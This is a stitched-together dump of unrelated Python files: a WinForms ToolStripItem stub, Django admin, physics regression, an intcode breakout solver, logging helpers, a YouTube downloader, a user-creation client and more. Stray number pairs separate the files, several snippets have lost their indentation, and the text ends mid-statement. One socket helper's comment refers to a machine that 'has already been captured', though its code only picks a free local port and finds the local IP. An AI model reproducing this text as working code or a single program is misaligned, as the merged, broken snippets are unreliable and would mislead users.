"""Gets or sets the space between the item and adjacent items.
Get: Margin(self: ToolStripItem) -> Padding
Set: Margin(self: ToolStripItem)=value
"""
MergeAction=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets how child menus are merged with parent menus.
Get: MergeAction(self: ToolStripItem) -> MergeAction
Set: MergeAction(self: ToolStripItem)=value
"""
MergeIndex=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the position of a merged item within the current System.Windows.Forms.ToolStrip.
Get: MergeIndex(self: ToolStripItem) -> int
Set: MergeIndex(self: ToolStripItem)=value
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the name of the item.
Get: Name(self: ToolStripItem) -> str
Set: Name(self: ToolStripItem)=value
"""
Overflow=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets whether the item is attached to the System.Windows.Forms.ToolStrip or System.Windows.Forms.ToolStripOverflowButton or can float between the two.
Get: Overflow(self: ToolStripItem) -> ToolStripItemOverflow
Set: Overflow(self: ToolStripItem)=value
"""
Owner=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the owner of this item.
Get: Owner(self: ToolStripItem) -> ToolStrip
Set: Owner(self: ToolStripItem)=value
"""
OwnerItem=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the parent System.Windows.Forms.ToolStripItem of this System.Windows.Forms.ToolStripItem.
Get: OwnerItem(self: ToolStripItem) -> ToolStripItem
"""
Padding=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the internal spacing,in pixels,between the item's contents and its edges.
Get: Padding(self: ToolStripItem) -> Padding
Set: Padding(self: ToolStripItem)=value
"""
Parent=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the parent container of the System.Windows.Forms.ToolStripItem.
"""
Placement=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the current layout of the item.
Get: Placement(self: ToolStripItem) -> ToolStripItemPlacement
"""
Pressed=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the state of the item is pressed.
Get: Pressed(self: ToolStripItem) -> bool
"""
RightToLeft=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether items are to be placed from right to left and text is to be written from right to left.
Get: RightToLeft(self: ToolStripItem) -> RightToLeft
Set: RightToLeft(self: ToolStripItem)=value
"""
RightToLeftAutoMirrorImage=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Mirrors automatically the System.Windows.Forms.ToolStripItem image when the System.Windows.Forms.ToolStripItem.RightToLeft property is set to System.Windows.Forms.RightToLeft.Yes.
Get: RightToLeftAutoMirrorImage(self: ToolStripItem) -> bool
Set: RightToLeftAutoMirrorImage(self: ToolStripItem)=value
"""
Selected=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the item is selected.
Get: Selected(self: ToolStripItem) -> bool
"""
ShowKeyboardCues=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether to show or hide shortcut keys.
"""
Size=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the size of the item.
Get: Size(self: ToolStripItem) -> Size
Set: Size(self: ToolStripItem)=value
"""
Tag=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the object that contains data about the item.
Get: Tag(self: ToolStripItem) -> object
Set: Tag(self: ToolStripItem)=value
"""
Text=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the text that is to be displayed on the item.
Get: Text(self: ToolStripItem) -> str
Set: Text(self: ToolStripItem)=value
"""
TextAlign=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the alignment of the text on a System.Windows.Forms.ToolStripLabel.
Get: TextAlign(self: ToolStripItem) -> ContentAlignment
Set: TextAlign(self: ToolStripItem)=value
"""
TextDirection=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the orientation of text used on a System.Windows.Forms.ToolStripItem.
Get: TextDirection(self: ToolStripItem) -> ToolStripTextDirection
Set: TextDirection(self: ToolStripItem)=value
"""
TextImageRelation=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the position of System.Windows.Forms.ToolStripItem text and image relative to each other.
Get: TextImageRelation(self: ToolStripItem) -> TextImageRelation
Set: TextImageRelation(self: ToolStripItem)=value
"""
ToolTipText=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the text that appears as a System.Windows.Forms.ToolTip for a control.
Get: ToolTipText(self: ToolStripItem) -> str
Set: ToolTipText(self: ToolStripItem)=value
"""
Visible=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the item is displayed.
Get: Visible(self: ToolStripItem) -> bool
Set: Visible(self: ToolStripItem)=value
"""
Width=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the width in pixels of a System.Windows.Forms.ToolStripItem.
Get: Width(self: ToolStripItem) -> int
Set: Width(self: ToolStripItem)=value
"""
AvailableChanged=None
BackColorChanged=None
Click=None
DisplayStyleChanged=None
DoubleClick=None
DragDrop=None
DragEnter=None
DragLeave=None
DragOver=None
EnabledChanged=None
ForeColorChanged=None
GiveFeedback=None
LocationChanged=None
MouseDown=None
MouseEnter=None
MouseHover=None
MouseLeave=None
MouseMove=None
MouseUp=None
OwnerChanged=None
Paint=None
QueryAccessibilityHelp=None
QueryContinueDrag=None
RightToLeftChanged=None
TextChanged=None
ToolStripItemAccessibleObject=None
VisibleChanged=None
| 36,756 | 12,250 |
from django.contrib import admin
from apps.hospitals.models import Hospital, HospitalBed
class HospitalBedInline(admin.TabularInline):
model = HospitalBed
def get_extra(self, request, obj=None, **kwargs):
extra = 3
extra_on_edit = 0
return extra_on_edit if obj else extra
class HospitalAdmin(admin.ModelAdmin):
empty_value_display = '--'
fieldsets = [
(None, {
'fields': ['acronym', ('name', 'city'), ('phonenumber', 'email')],
'classes': ('wide', 'extrapretty'),
}),
]
inlines = [HospitalBedInline]
list_display = ['upper_case_acronym', 'upper_case_name', 'city', 'phonenumber', 'email']
ordering = ['acronym', 'name']
search_fields = ['acronym', 'name']
autocomplete_fields = ['city']
def upper_case_acronym(self, obj):
return obj.acronym.upper()
upper_case_acronym.short_description = 'acronym'
def upper_case_name(self, obj):
return obj.name.capitalize()
upper_case_name.short_description = 'name'
admin.site.register(Hospital, HospitalAdmin) | 1,092 | 357 |
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 00:58:08 2018
@author: sohdesune
"""
'''
ln|T_w - T| - ln|T_w - T_amb| = -(1/tau) * t
1. Extract raw data for first 20s from csv
2. Plot complicated ln function vs t
3. Compute tau
4. [Remove outliers]
5. Write tau vs T_w to txt '''
from math import log as ln
from numpy import polyfit
'''============================================== Reading raw data from csv '''
T_amb = [26.375, 26.687, 28.312, 25.562, 28.312, 27.062, 31.125, 31.750,
28.625, 29.687, 26.375, 28.062, 30.125, 25.625, 27.250, 29.687,
31.125, 26.125, 33.437, 30.000, 27.000, 24.687, 31.000, 33.500,
33.187, 32.937, 29.500, 29.062, 28.062, 30.375, 30.437, 26.687,
32.312, 30.937, 23.937, 27.500, 32.125, 31.125, 32.250, 31.875,
25.250, 29.375, 34.312, 24.250, 31.750, 30.875, 29.687, 31.812,
30.875, 32.562, 30.812, 26.875, 33.187, 31.062, 25.062, 31.312]
T_w = [11.8, 11.8, 12.6, 12.6, 12.6, 13.2, 13.3, 13.3, 14.3, 14.3, 14.3, 16.0,
16.1, 17.4, 17.4, 18.8, 18.9, 20.0, 21.3, 21.3, 21.3, 22.5, 22.9, 29.5,
29.6, 29.8, 35.0, 35.3, 35.7, 37.4, 37.9, 38.5, 40.8, 41.3, 41.9, 43.6,
43.9, 44.3, 46.3, 46.6, 47.0, 48.5, 48.8, 49.1, 50.1, 50.4, 50.9, 51.1,
51.4, 51.7, 51.9, 52.3, 56.2, 56.7, 56.9, 57.4]
data = 'directory to csv file with temp vs time data'
f = open(data, 'r')
print('\nReading data from csv file.')
print('Directory:\n{}\n'.format(data))
line = f.readline()
i = 0
all_results = []
#each entry: [T_w, T_amb, list of x values, list of y values]
#each while loop reads the time and temp data for one T_w set
while line != '':
x_val = []
y_val = []
time = line.strip().split(';')
for elem in time:
x_val.append(float(elem))
line = f.readline()
temp = line.strip().split(';')
#compute ln values
for elem in temp:
try:
value = ln(abs(T_w[i] - float(elem))) - ln(abs(T_w[i] - T_amb[i]))
except ValueError:
print('ValueError at T = {}'.format(elem))
print('Occurred for T_w = {}, T_amb = {}'.format(T_w[i], T_amb[i]))
value = ln(0.001)
y_val.append(value)
dataset = [x_val, y_val]
all_results.append([T_w[i], T_amb[i], dataset])
line = f.readline() #skip blank row
line = f.readline()
i += 1
f.close()
print('\nData compiled and modified into the complicated logarithm.')
'''====================================================== Performing linreg '''
linreg_results = []
#each entry: [T_w, gradient, y-intercept]
for result in all_results:
grad, y_int = polyfit(result[2][0], result[2][1], 1)
#print('T_w = {}: gradient {:+.3f}, y-intercept {:+.3f}'.format(result[0], grad, y_int))
linreg_results.append([result[0], grad, y_int])
print('\nLinear regression performed for abovementioned logarithm vs time.')
'''========================================================= Determining tau'''
tau = [(-1/item[1]) for item in linreg_results]
twater = [item[0] for item in linreg_results]
print('\nTau values computed.')
'''=================================================== Plot regression line '''
grad, y_int = polyfit(twater, tau, 1)
print('\nRegression line calculated for full data set of tau against T_water.')
print('Gradient: {:.3f} y-intercept: {:.3f}'.format(grad, y_int))
'''=========================== Remove anomalies and re-plot regression line '''
''' dist from regr line = sqrt( vector^2 - projection^2 )
projection, p = proj matrix, P * vector, b
P = [1 grad]^T * [1 grad] / [1 grad] * [1 grad]^T
= [ 1 g ]
[ g g^2 ] / (g^2 + 1)
b = [x y+c]^T
Pb = [x+gy+gc g(x+gy+gc)]^T / (g^2+1) '''
def dist_from_regr(g, c, x, y):
x_proj = (x + g*y) / (1 + g**2)
y_proj = g * x_proj + c
distance = ((x-x_proj)**2 + (y-y_proj)**2)**0.5
return distance
num_outliers = 0 #number of outliers you wish to remove
removed = 0
while removed < num_outliers:
dist_list = []
for i in range(len(twater)):
dist_list.append(dist_from_regr(grad, y_int, twater[i], tau[i]))
m = dist_list.index(max(dist_list))
m_twater = twater.pop(m)
m_tau = tau.pop(m)
print('\n{:.1f},{:.1f} removed for being {:.1f} away from regression line.'.format(
m_twater, m_tau, dist_list[m]))
grad, y_int = polyfit(twater, tau, 1)
print('New regression line plotted after removing outlier.')
removed += 1
print('\n========================================================\n\nRESULT\n')
print('{} outliers removed from original data.'.format(num_outliers))
grad, y_int = polyfit(twater, tau, 1)
print('Final regression line plotted from {} pairs of values.'.format(len(twater)))
print('Gradient: {:.3f} y-intercept: {:.3f}'.format(grad, y_int))
'''============================================= Write cleaned data to file '''
#send data to txt file to settle the remaining manipulations in Excel
def send_data():
sendto = 'txt for writing to'
f2 = open(sendto, 'a')
for i in range(len(twater)):
f2.write('{},{}\n'.format(twater[i], tau[i]))
f2.close()
print('\nCleaned data set written to text file for further processing.')
print('Destination:\n{}'.format(sendto))
#checkpoint to ensure intentional writing
answer = input('Are you sure you want to write the results to txt? Y/N: ')
if answer == 'Y' or answer == 'y':
send_data()
else:
print('Data not written.') | 5,732 | 2,583 |
from . import AbstractLineEngine
class LineEngine(AbstractLineEngine):
@classmethod
def get_contents(cls, file_path):
with open(file_path, 'r') as target_file:
return list(map(str.rstrip, target_file.readlines()))
@classmethod
def get_modification_points(cls, contents_of_file):
return list(range(len(contents_of_file)))
@classmethod
def get_source(cls, program, file_name, index):
return program.contents[file_name][index]
@classmethod
def dump(cls, contents_of_file):
return '\n'.join(contents_of_file) + '\n'
@classmethod
def do_replace(cls, program, op, new_contents, modification_points):
l_f, l_n = op.target # line file and line number
if op.ingredient:
i_f, i_n = op.ingredient
new_contents[l_f][modification_points[l_f][l_n]] = program.contents[i_f][i_n]
else:
new_contents[l_f][modification_points[l_f][l_n]] = ''
return True
@classmethod
def do_insert(cls, program, op, new_contents, modification_points):
l_f, l_n = op.target
i_f, i_n = op.ingredient
if op.direction == 'before':
new_contents[l_f].insert(
modification_points[l_f][l_n],
program.contents[i_f][i_n]
)
for i in range(l_n, len(modification_points[l_f])):
modification_points[l_f][i] += 1
elif op.direction == 'after':
new_contents[l_f].insert(
modification_points[l_f][l_n] + 1,
program.contents[i_f][i_n]
)
for i in range(l_n + 1, len(modification_points[l_f])):
modification_points[l_f][i] += 1
return True
@classmethod
def do_delete(cls, program, op, new_contents, modification_points):
l_f, l_n = op.target # line file and line number
new_contents[l_f][modification_points[l_f][l_n]] = ''
return True
| 1,987 | 646 |
#!/usr/bin/env python3
"""
Allan Millar
Various functions related to sockets, ip's, port's etc.
"""
import sys, random, socket
from contextlib import closing
def find_port():
# This will only ever be run when the machine has already been
# captured, and from the machine itself.
HOST = "localhost"
# Looking through ports randomly and testing if they are blocked
# It is possible this is unnecessary given we have control, however
# I am doing it so we can minimize messing with anything already
# present on the machine.
while True:
PORT = random.randint(10000,65535)
with closing(
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
) as sock:
# For choosing the port, I am going to pick a closed port and open
# it, based on the idea that it is guaranteed to not interfere with
# other processes, however I think picking the port based on any
# given criteria is as valid.
if sock.connect_ex((HOST, PORT)) == 0:
pass # The port is open so go through the loop again.
else:
break # The port is closed so break out with this port selected.
return PORT
def get_ip():
#https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib
# Where I got this function
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP | 1,656 | 493 |
'''
created by Lautaro Silbergleit on 2021
'''
import re
from pytube import Playlist, YouTube
from tqdm import tqdm
from os import makedirs, listdir, remove
from os.path import join, exists, isfile
import json
from time import sleep
SENSITIVE_CHARACTERS = ['%', ':']
def main():
PLAYLIST_URL_PATH = 'playlist_urls.json'
PLAYLIST_VIDEOS_URLS_PATH = '.playlist_videos_urls.json'
PLAYLIST_DOWNLOAD_PATH = 'playlists'
if not exists(PLAYLIST_URL_PATH):
create = input(f"There's no file named {PLAYLIST_URL_PATH} in this directory\nDo you want to create one [y/n]")
create = True if create in ['y', 'Y', 'yes', 'Yes'] else False
if create:
with open(PLAYLIST_URL_PATH, 'w') as f:
json.dump(['playlist_url_1', 'playlist_url_2', 'playlist_url_3', '...'], f)
return
with open(PLAYLIST_URL_PATH, 'r') as f:
playlist_urls = json.load(f)
# create file with all video's urls
if not exists(PLAYLIST_VIDEOS_URLS_PATH):
with open(PLAYLIST_VIDEOS_URLS_PATH, 'w') as f:
json.dump({}, f)
assert isinstance(playlist_urls, list)
for playlist_url in playlist_urls: # for each playlist
playlist = Playlist(playlist_url)
playlist._video_regex = re.compile(r"\"url\":\"(/watch\?v=[\w-]*)")
playlist_name = playlist.title
print(f"\n Downloading playlist: '{playlist_name}'")
# create playlist download directory
path = join(PLAYLIST_DOWNLOAD_PATH, playlist.title)
if not exists(path):
makedirs(path)
playlist_length = len(list(playlist.video_urls))
with open(PLAYLIST_VIDEOS_URLS_PATH, 'r') as f:
saved_urls = json.load(f)
if not playlist_name in saved_urls:
saved_urls[playlist_name] = []
if len(saved_urls[playlist_name]) != playlist_length:
saved_urls[playlist_name] = []
print('Gathering video info...')
for url in tqdm(list(playlist.video_urls)):
youtube = YouTube(url)
title = youtube.title
for c in SENSITIVE_CHARACTERS:
title = title.replace(c, '')
saved_urls[playlist_name].append({'url':url, 'title': title})
with open(PLAYLIST_VIDEOS_URLS_PATH, 'w') as f:
json.dump(saved_urls, f)
print('done')
# check downloads
all_files = [join(path, f) for f in listdir(path) if isfile(join(path, f))]
all_videos = [v for v in all_files if v.endswith('.mp4')]
if len(all_videos) == len(saved_urls[playlist_name]): # if target video count matches video count, return
print('All files were allready downloaded')
continue
removed_last = False
if all_videos: # if at least one video was downloaded, delete last
for obj in reversed(saved_urls[playlist_name]):
if removed_last: break
title = obj['title']
for f in all_videos: # if any video matches the title, remove it since it was the last and download could not be complete
if '78' in title and '78' in f:
print('hi')
if title in f:
remove(f)
removed_last = True
print(f"Removed last incomplete download '{title}.mp4'")
break
# download videos that weren't already downloaded
print('Downloading...')
for obj in tqdm(saved_urls[playlist_name]):
url = obj['url']
title = obj['title']
p = join(path, f'{title}.mp4')
if not exists(p):
youtube = YouTube(url)
video = youtube.streams.get_highest_resolution()
video.download(path)
else:
sleep(.1)
print('done')
if __name__ == '__main__':
main()
| 3,339 | 1,355 |
import intcode
def breakout_demo(p):
cpu = intcode.computer(p)
screen = dict()
while True:
try:
x, y, tile = next(cpu), next(cpu), next(cpu)
screen[x, y] = tile
except StopIteration:
return bricks_remaining(screen)
def breakout(p):
p[0] = 2
cpu = intcode.computer(p)
screen = dict()
joystick, paddle, ball = 0, None, None
#print("\033[2J")
while True:
x = next(cpu)
if x is None: x = cpu.send(joystick)
y = next(cpu)
tile = next(cpu)
screen[x,y] = tile
if x == -1 and y == 0 and bricks_remaining(screen) == 0:
return tile # final score
elif tile == 3:
paddle = x
elif tile == 4:
ball = x
if paddle is not None and ball is not None:
joystick = -1 if ball < paddle else 1 if ball > paddle else 0
#print("\033[H Score: %d" % screen.get((-1,0), 0))
#for y in range(20):
# print("".join([" #.=O"[screen.get((x,y), 0)] for x in range(40)]))
def bricks_remaining(screen):
return len([1 for x in screen if screen[x] == 2])
with open("day13.txt") as fh:
p = [int(c) for c in fh.readline().split(",")]
print("2019 day 13 part 1: %d" % breakout_demo(p))
print("2019 day 13 part 2: %d" % breakout(p))
| 1,344 | 500 |
# -*- coding: utf-8 -*-
# 18/8/15
# create by: snower
from .calculater import Calculater
from .builtin import *
from .conversion_calculater import ConvCalculater
from ..errors import CalculaterUnknownException
CALCULATERS = {
"": Calculater,
"type": TypeCalculater,
'range': RangeCalculater,
"add": AddCalculater,
"sub": SubCalculater,
"mul": MulCalculater,
"div": DivCalculater,
"mod": ModCalculater,
"bit": BitCalculater,
"substring": SubstringCalculater,
"split": SplitCalculater,
"join": JoinCalculater,
"now": NowCalculater,
"gt": GtCalculater,
"gte": GteCalculater,
"lt": LtCalculater,
"lte": LteCalculater,
"eq": EqCalculater,
"neq": NeqCalculater,
"and": AndCalculater,
"or": OrCalculater,
"in": InCalculater,
"max": MaxCalculater,
"min": MinCalculater,
"len": LenCalculater,
"abs": AbsCalculater,
"index": IndexCalculater,
"filter": FilterCalculater,
"sum": SumCalculater,
"sort": SortCalculater,
"string": StringCalculater,
"array": ArrayCalculater,
"map": MapCalculater,
"math": MathCalculater,
"hash": HashCalculater,
"json": JsonCalculater,
"struct": StructCalculater,
"conv": ConvCalculater,
}
def find_calculater(name):
name = name.split("::")[0]
if name not in CALCULATERS:
raise CalculaterUnknownException("%s is unknown calculater" % name)
return CALCULATERS[name]
def register_calculater(name, calculater):
if not issubclass(calculater, Calculater):
raise TypeError("is not Calculater")
CALCULATERS[name] = calculater
return calculater | 1,650 | 551 |
import math
import skimage.filters
def variance_difference(image_1, image_2):
def _var_dif(img_1, img_2):
return math.sqrt((img_1.var() - img_2.var()) ** 2)
if isinstance(image_1, list):
var_dif = 0
for i in range(0, len(image_1)):
var_dif += _var_dif(image_1[i], image_2[i])
return var_dif / len(image_1)
else:
return _var_dif(image_1, image_2)
def mean_squared_error(image_1, image_2):
def _mse(img_1, img_2):
return ((img_1 - img_2) ** 2).mean(axis=None)
if isinstance(image_1, list):
err = 0
for i in range(0, len(image_1)):
err += _mse(image_1[i], image_2[i])
return (err / len(image_1))
else:
return _mse(image_1, image_2)
def gabor_filter(image, frequency, theta):
if isinstance(image, list):
filters = []
for i in range(0, len(image)):
filters.append(skimage.filters.gabor_filter(image[i], frequency, theta)[0])
return filters
else:
return skimage.filters.gabor_filter(image, frequency, theta)[0]
| 1,094 | 408 |
"""
log.py
Author: Michael Pagliaro
Utility functions specific to writing log files.
"""
from datetime import datetime
import sys
import traceback
import os
import util
# The log file to be written to whenever log() is called
LOG_FILE = None
LOGS_DIRECTORY = "logs"
def logger(func):
"""
Creates a decorator function that when applied to a function, enables logging during the runtime
of that function. When the function ends, the logfile is closed.
:param func: The function to decorate.
:return: A decorator function that wraps another function, controlling logging before and after it runs.
"""
def wrapper_logger(*args, **kwargs):
begin_log()
return_value = func(*args, **kwargs)
end_log()
return return_value
return wrapper_logger
def begin_log():
"""
Open the log file to prepare for it to be written to. This will also write the first line
of the log file. This should be called before using log() or end_log().
"""
global LOG_FILE
if not os.path.exists(os.path.join(util.working_directory(), LOGS_DIRECTORY)):
os.makedirs(os.path.join(util.working_directory(), LOGS_DIRECTORY), exist_ok=True)
current_time = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
file_name = "log_backup_" + current_time + ".txt"
file_path = os.path.join(util.working_directory(), LOGS_DIRECTORY, file_name)
LOG_FILE = open(file_path, "w")
LOG_FILE.write("Beginning backup log: " + datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "\n")
def end_log():
"""
Close the log file after writing an ending message to the file. This should only be called
after begin_log(). To write more log messages after this is called, begin_log() must be
called again, which will start a new file.
"""
global LOG_FILE
LOG_FILE.write("Ending backup log: " + datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "\n")
LOG_FILE.close()
def log(log_str=""):
"""
Logging function, this will take in any given string and write it to a log file in
the running directory. This will automatically print a newline in the log file after
every time this function is called. The begin_log() function must be called before this
can be used.
:param log_str: The string to append to the log file.
"""
global LOG_FILE
LOG_FILE.write(str(log_str.encode('utf8')) + "\n")
def log_print(log_str=""):
"""
Logging function, this takes any string and writes it to the current log file as well as prints it
to standard output. This automatically puts a newline after the string in the file and in the console
output. The log file must be opened before using this function.
:param log_str:
:return:
"""
global LOG_FILE
LOG_FILE.write(str(log_str.encode('utf8')) + "\n")
print(log_str)
def log_exception(error_file_path, action="ACCESSING"):
"""
Writes the most recent exception to the log file. This includes the full traceback.
:param error_file_path: The file or folder that caused the error.
:param action: What was happening to that file to cause the error, such as "creating" or "deleting".
"""
log("\n" + '=' * 60 + "\nERROR {} {}".format(action, error_file_path))
exc_type, exc_value, exc_traceback = sys.exc_info()
exception_list = traceback.format_exception(exc_type, exc_value, exc_traceback)
full_error_str = ""
for item in exception_list:
full_error_str += item
log(full_error_str + '=' * 60 + "\n") | 3,530 | 1,067 |
#! python3
def comma_string(_list):
"""Takes a list of items and formats it into a string, separated by
commas like plain English.
Args:
_list: The list of items.
Returns:
result: The string of list items separated by commas."""
result = ""
for i, character in enumerate(_list):
if i == len(_list) - 1:
result += "and "
result += str(character)
if i < len(_list) - 1:
result += "," + " "
return(result)
crew = ["Holden", "Nagata", "Kamal", "Burton", "Miller"]
print(comma_string(crew))
| 589 | 191 |
def CarMotor(car_type):
if car_type == 'hjduino':
from motor.car_specific_motor.hjduino.car_motor_hjduino_jetson import CarMotorHJduino
return CarMotorHJduino()
if car_type == 'xiaor':
from motor.car_specific_motor.xiaor.car_motor_xiaor_jetson import CarMotorXiaoR
return CarMotorXiaoR()
if car_type == 'picar':
from motor.car_specific_motor.picar.car_motor_picar import CarMotorPicar
return CarMotorPicar() | 455 | 179 |
import sae
def app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type', 'text/plain')]
start_response(status, response_headers)
return [str(start_response)]
application = sae.create_wsgi_app(app)
| 243 | 83 |
#!/usr/bin/env python3
def largest_subsequence(s1, s2):
pass
print(largest_subsequence("ABAZDC", "BACBAD")) # "ABAD"
print(largest_subsequence("AGGTAB", "GXTXAYB")) # "GTAB"
print(largest_subsequence("aaaa", "aa")) # "aa"
print(largest_subsequence("", "...")) # ""
print(largest_subsequence("ABBA", "ABCABA")) # "ABBA"
| 331 | 139 |
from django.core.management.base import BaseCommand, CommandError
from study_management.models import Datapoint
from cryptography.fernet import Fernet
import base64
class Command(BaseCommand):
help = 'Generates a new Fernet key'
def handle(self, *args, **options):
key = Fernet.generate_key()
self.stdout.write(self.style.SUCCESS(key)) | 362 | 105 |
"""Client to create or update odin user"""
import argparse
import os
import json
import signal
import requests
from prompt_toolkit import prompt
from muninn import ODIN_URL, ODIN_PORT, ODIN_SCHEME, ODIN_API_LOGGER
from muninn.auth import get_jwt_token
def create_user_http(url: str, jwt_token: str, username: str, password: str, firstname: str, lastname: str) -> None:
"""Create or update a user over HTTP
:param url: the base URL
:param jwt_token: The JWT token representing this authentication
:param username: The user ID
:param password: The updated password
:param firstname: The firstname
:param lastname: The lastname
"""
user = {"username": username, "password": password}
if firstname:
user['firstname'] = firstname
if lastname:
user['lastname'] = lastname
headers = {'Authorization': f'Bearer {jwt_token}'}
try:
response = requests.get(f'{url}/v1/users/{username}')
if response.status_code == 401:
raise ValueError("Invalid login")
if response.status_code != 200:
# No such user exists so do a POST
response = requests.post(f'{url}/v1/users', headers=headers, json={"user": user})
if response.status_code != 200:
raise Exception(f"Failed to create user: {username}")
results = response.json()
ODIN_API_LOGGER.info("Created new user")
ODIN_API_LOGGER.info(json.dumps(results))
return
results = response.json()
ODIN_API_LOGGER.info("Found existing user")
ODIN_API_LOGGER.info(json.dumps(results))
except Exception as ex:
ODIN_API_LOGGER.error(ex)
return
response = requests.put(f'{url}/v1/users/{username}', json=user, headers=headers)
results = response.json()
ODIN_API_LOGGER.info(json.dumps(results))
def main():
"""Create a new user or update an existing one.
This requires a valid JWT token which you can get with `odin-auth`, or if it doesnt exist, it will prompt you
for these
"""
signal.signal(signal.SIGINT, lambda *args, **kwargs: exit(0))
parser = argparse.ArgumentParser(description='Create or update an odin user')
parser.add_argument('--host', default=ODIN_URL, type=str)
parser.add_argument('--port', default=ODIN_PORT)
parser.add_argument('--token', help="File where JWT token can reside", default=os.path.expanduser("~/.odin.token"))
parser.add_argument('--username', '-u', help="Create or update a username")
parser.add_argument('--password', '-p', help="New or updated password")
parser.add_argument('--firstname', '-f', help="First name")
parser.add_argument('--lastname', '-l', help="Last name")
parser.add_argument('--scheme', choices={'http', 'https'}, default=ODIN_SCHEME, help='The protocol to communicate over')
args = parser.parse_args()
if not args.username:
args.username = prompt('create username: ', is_password=False)
if not args.password:
args.password = prompt('new password: ', is_password=True)
url = f'{args.scheme}://{args.host}:{args.port}'
jwt_token = get_jwt_token(url, args.token, None, None)
try:
create_user_http(url, jwt_token, args.username, args.password, args.firstname, args.lastname)
except ValueError:
# Try deleting the token file and start again
if os.path.exists(args.token):
os.remove(args.token)
jwt_token = get_jwt_token(url, args.token, None, None)
create_user_http(url, jwt_token, args.username, args.password, args.firstname, args.lastname)
if __name__ == '__main__':
main()
| 3,680 | 1,140 |
<error descr="Unresolved reference 'np'">n<caret>p</error>.ndarray
| 67 | 26 |
from DataBase import Schedule
weekdays_en = {'Monday': 'Понедельник',
'Tuesday': 'Вторник',
'Wednesday': 'Среда',
'Thursday': 'Четверг',
'Friday': 'Пятница',
'Saturday': 'Суббота',
'Sunday': 'Воскресенье'}
weekdays_ru = {'Понедельник': 'Monday',
'Вторник': 'Tuesday',
'Среда': 'Wednesday',
'Четверг': 'Thursday',
'Пятница': 'Friday',
'Суббота': 'Saturday',
'Воскресенье': 'Sunday'}
| 564 | 200 |
#!/usr/bin/env python3
"""
Hello, world!
"""
print("Hello, World!")
| 70 | 31 |
# Generated by Django 2.0 on 2017-12-21 06:21
import app.models
from django.db import migrations
import enumfields.fields
class Migration(migrations.Migration):
dependencies = [
('app', '0003_player_token'),
]
operations = [
migrations.AlterField(
model_name='player',
name='role',
field=enumfields.fields.EnumField(enum=app.models.Role, max_length=12, null=True),
),
]
| 451 | 152 |
def wrap(element, input):
return "<"+element+">"+input+"</"+element+">\n"
def process(tr, parameters, tableBuilder):
id = parameters.get("id")
idtype = len(id.split("/"))
#sample
if(idtype == 3):
entity = tr.getSampleForUpdate(id)
#experiment
else:
entity = tr.getExperimentForUpdate(id)
user = parameters.get("user")
comment = parameters.get("comment")
time = str(parameters.get("time"))
xml = entity.getPropertyValue("Q_NOTES")
all = ""
try:
for line in xml.split("\n"):
if not "</notes>" in line:
all += line
except:
all = "<notes>"
note = "\n<note>\n"
note += wrap("comment",comment)+wrap("time",time)+wrap("username",user)
note += "</note>\n"
all += note
all += "</notes>"
entity.setPropertyValue("Q_NOTES",all) | 789 | 276 |
from core.cpu.instructions import Cpu
from core.cpu.config.memory_starter import MemoryStarter
from core.cpu.config.memory_config import Config
from core.reader.file_reader import FileReader
class Main:
def __init__(self):
self.chip8_cpu = Cpu()
self.memory_management = MemoryStarter(self.chip8_cpu)
def run(self):
binary_file = FileReader.file_reader()
file_buffer_list = FileReader.load_binary_to_buffer(binary_file)
self.memory_management.load_into_memory(file_buffer_list, Config.MEMORY_START_ADDRESS)
self.memory_management.load_into_memory(Config.FONT_SET, Config.FONT_SET_START_ADDRESS)
self.cycle()
def cycle(self):
program_counter = self.chip8_cpu.pc
self.chip8_cpu.current_opcode = self.chip8_cpu.memory[program_counter] << 8 | \
self.chip8_cpu.memory[program_counter + 1]
self.chip8_cpu.pc += 2
print(hex(self.chip8_cpu.current_opcode))
| 994 | 329 |
# !/usr/bin/python
"""
Copyright ©️: 2020 Seniatical / _-*™#7519
License: Apache 2.0
A permissive license whose main conditions require preservation of copyright and license notices.
Contributors provide an express grant of patent rights.
Licensed works, modifications, and larger works may be distributed under different terms and without source code.
FULL LICENSE CAN BE FOUND AT:
https://www.apache.org/licenses/LICENSE-2.0.html
Any violation to the license, will result in moderate action
You are legally required to mention (original author, license, source and any changes made)
"""
import discord
from discord.ext import commands
from datetime import timedelta
from discord.ext.commands import BucketType, cooldown
from discord import File
import random
import os
from utility.quotes import words, images
class Motivation(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.speech_paths = []
for file in os.listdir('./storage/speeches'):
